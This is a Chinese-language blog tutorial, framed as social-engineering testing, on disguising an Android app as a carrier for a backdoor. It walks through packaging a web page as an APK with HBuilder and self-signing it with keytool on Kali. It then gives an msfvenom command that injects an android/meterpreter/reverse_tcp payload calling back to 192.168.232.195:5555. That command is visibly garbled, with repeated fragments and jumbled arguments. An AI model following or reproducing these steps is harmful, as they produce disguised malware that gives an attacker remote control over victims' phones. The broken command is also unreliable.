在网络安全中,社会工程学 已经是一种最为致命的测试手段。常常让人出其不意,今天来看看如何利用 Shell伪装的艺术 来进行社会工程学测试。
伪装的艺术
对安卓 shell 的伪装
利用 HBuilder 将 Web 页面打包成 APP
文件-新建-移动APP
配置 APP 项目
需要注意是 页面入口 便是 APP 启动后要进入的页面。
设置图标
需要注意的是图标格式为 PNG
设置启动页
打包 APP
右键项目-发行-发行原生APP
关于签名
如果你不懂关于 androdi 的前面,建议使用公用证书。但是需要实名认证。于是我这里用了自己的证书!
自建证书
在 Kali 下我们利用下面命令建立证书。
keytool -genkey -alias testalias -keyalg RSA -keysize 2048 -validity 36500 -keystore kali.keystore
Bash
复制
这样我们便创建了一个名为 kali.keystore 的证书,输入证书的密码,位置等信息打包即可!
获取 app
在 发行-查看APP打包状态 获取已经打包好的 app
添加后门
msfvenom -p -x kali.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali1.apk=192.168.232.195 LPORT=5555 R > kali1.apk192.168.232.195 LPORT=5555 R > kali1.apk=5555 R > kali1.apk5555 R > kali1.apk> kali1.apk kali1.apk
Bash
复制
参数说明:
-x 原生 APP
kali1.apk 最后生成含有后门的 app
安装 app
运行 app | 
发表于 2020-11-25 11:44:32
